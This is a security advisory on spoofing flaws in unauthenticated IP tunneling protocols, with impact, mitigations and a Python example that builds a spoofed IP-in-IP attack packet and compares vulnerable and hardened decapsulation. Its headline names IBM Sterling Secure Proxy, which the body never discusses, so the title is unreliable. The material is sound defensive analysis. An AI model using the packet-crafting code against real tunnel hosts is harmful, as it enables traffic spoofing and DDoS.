IBM Sterling Secure Proxy Vulnerabilities Expose Systems to High-Risk Exploits
January 21, 2025
Severity
High
Analysis Summary
Recent research has revealed critical vulnerabilities in several tunneling protocols that expose millions of internet hosts to attack. These protocols, including IP6IP6, GRE6, 4in6, and 6in4, are primarily used to connect otherwise separate networks, but on their own they provide no authentication or encryption of the encapsulated traffic unless they are paired with a protocol such as IPSec.
The researchers report that the assigned CVE identifiers, including CVE-2024-7595 and CVE-2025-23018, cover flaws that let an attacker inject traffic into a tunnel or spoof source IP addresses, enabling distributed denial-of-service (DDoS) attacks and unauthorized access to private networks. Roughly 4.2 million hosts are affected, with China, France, Japan, the U.S., and Brazil topping the list of impacted regions.
The exploitation process involves sending a specially crafted packet with two IP headers. The outer header carries the attacker's source IP and the vulnerable host's destination IP, while the inner header names the vulnerable host as the source. On receiving the packet, the vulnerable host strips the outer header and forwards the inner packet, so the malicious traffic appears to originate from the trusted host. Because the host accepts the encapsulated packet without checking who sent it, this technique bypasses source-address filters and lets attackers use exposed systems as one-way proxies or to conduct anonymous attacks.
The repercussions are significant: network congestion, service disruption, and even device crashes from resource exhaustion. Attackers could also use these vulnerabilities to intercept data or perform man-in-the-middle attacks. Content delivery network (CDN) nodes, ISP home routers, mobile network gateways, VPN servers, and core internet routers are particularly at risk, so the impact reaches both individual and organizational networks.
To mitigate these threats, use IPSec or WireGuard for authentication and encryption, and restrict tunneling packets to trusted sources. Network-level defenses should include traffic filtering, deep packet inspection (DPI), and blocking unencrypted tunneling packets. Without these measures, vulnerable systems remain at risk of becoming unwitting participants in larger attacks, amplifying their impact on global internet infrastructure.
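The two-header packet described above and the source-restriction check recommended as mitigation, as an added Python example that is not part of the original advisory or the researchers' material. It uses IPv4-in-IPv4 (IP protocol 4) as the simplest stand-in for the listed encapsulations; the 4in6, 6in4 and IP6IP6 header layouts differ but the attack shape is the same. All addresses are constructed test values from documentation ranges, the `decapsulate_*` functions are hypothetical models of a tunnel endpoint rather than code from any real router or VPN implementation, and the "protected networks" rule is an assumed anti-spoofing policy.

```python
import socket
import struct
from ipaddress import ip_address, ip_network
from typing import Iterable, Optional

IPPROTO_IPIP = 4  # IPv4-in-IPv4 (RFC 2003), used here as the simplest encapsulation
IPPROTO_UDP = 17


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement checksum over the header bytes (0 for a valid header)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:  # end-around carry
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, proto: int, payload_len: int, ttl: int = 64) -> bytes:
    """Minimal 20-byte IPv4 header, no options, correct checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]


def parse_ipv4(pkt: bytes) -> dict:
    """Decode an IPv4 header; rejects truncated packets and bad checksums."""
    if len(pkt) < 20:
        raise ValueError("packet too short")
    ver_ihl, _tos, total_len, _id, _ff, ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(pkt) < total_len:
        raise ValueError("malformed IPv4 packet")
    if ipv4_checksum(pkt[:ihl]) != 0:
        raise ValueError("bad header checksum")
    return {"proto": proto, "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "ttl": ttl, "payload": pkt[ihl:total_len]}


def craft_spoofed_tunnel_packet(attacker: str, tunnel_host: str, victim: str, payload: bytes) -> bytes:
    """The attack packet from the advisory: outer header attacker -> tunnel host,
    inner header forged to claim the tunnel host itself as the source."""
    inner = build_ipv4_header(tunnel_host, victim, IPPROTO_UDP, len(payload)) + payload
    outer = build_ipv4_header(attacker, tunnel_host, IPPROTO_IPIP, len(inner))
    return outer + inner


def decapsulate_unauthenticated(pkt: bytes) -> bytes:
    """Vulnerable behaviour: strip the outer header and forward whatever is inside,
    regardless of who sent the outer packet or what the inner source claims."""
    outer = parse_ipv4(pkt)
    if outer["proto"] != IPPROTO_IPIP:
        raise ValueError("not an IP-in-IP packet")
    return outer["payload"]


def decapsulate_checked(pkt: bytes, local_addr: str, trusted_peers: Iterable[str],
                        protected_nets: Iterable[str]) -> Optional[bytes]:
    """Hardened behaviour (assumed policy): accept tunnel packets only from configured
    peers, and drop inner packets whose source would impersonate this host or a
    network on this side of the tunnel. Returns the inner packet or None if dropped."""
    outer = parse_ipv4(pkt)
    if outer["proto"] != IPPROTO_IPIP or outer["src"] not in set(trusted_peers):
        return None  # not a tunnel packet from a known endpoint
    inner = parse_ipv4(outer["payload"])
    inner_src = ip_address(inner["src"])
    if inner["src"] == local_addr or any(inner_src in ip_network(n) for n in protected_nets):
        return None  # inner source claims an address we own: spoofing attempt
    return outer["payload"]


if __name__ == "__main__":
    # Constructed test values: attacker, exposed tunnel host, and the target.
    pkt = craft_spoofed_tunnel_packet("203.0.113.7", "198.51.100.1", "192.0.2.9", b"hello")
    forwarded = decapsulate_unauthenticated(pkt)
    print("vulnerable host forwards packet claiming src", parse_ipv4(forwarded)["src"])
    print("hardened host result:",
          decapsulate_checked(pkt, "198.51.100.1", ["203.0.113.50"], ["198.51.100.0/24"]))
```

The unauthenticated path is the behaviour the advisory describes: the forwarded packet carries the tunnel host's own address as source, so downstream filters treat it as trusted. The checked path enforces both recommendations at once: the outer source must be a configured peer, and the inner source must belong to the peer's side of the tunnel. Note that a peer allow-list alone is still weak against an attacker who can spoof the peer's outer source address; that is the gap IPSec or WireGuard closes by authenticating the encapsulation itself.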
Impact
- DDoS
- Unauthorized Access
- Data Manipulation
Remediation
- Implement IPSec or WireGuard to ensure authentication and encryption of tunneling traffic.
- Only accept tunneling packets from trusted and verified sources.
- Configure routers and middleboxes to block untrusted or unencrypted tunneling packets.
- Use Access Control Lists (ACLs) to restrict access to critical systems.
- Perform thorough analysis of network traffic to identify and block malicious tunneling packets.
- Regularly apply security patches and updates to routers, VPN servers, and other network devices to mitigate known vulnerabilities.
- Isolate sensitive systems and private networks to limit the spread of an attack.
- Use intrusion detection systems (IDS) or intrusion prevention systems (IPS) to identify suspicious tunneling activities.
- Train network administrators to recognize and respond to tunneling-related threats effectively.
- Work with internet service providers to identify and filter malicious traffic at the ISP level.
- Disable unnecessary tunneling protocols and services on network devices.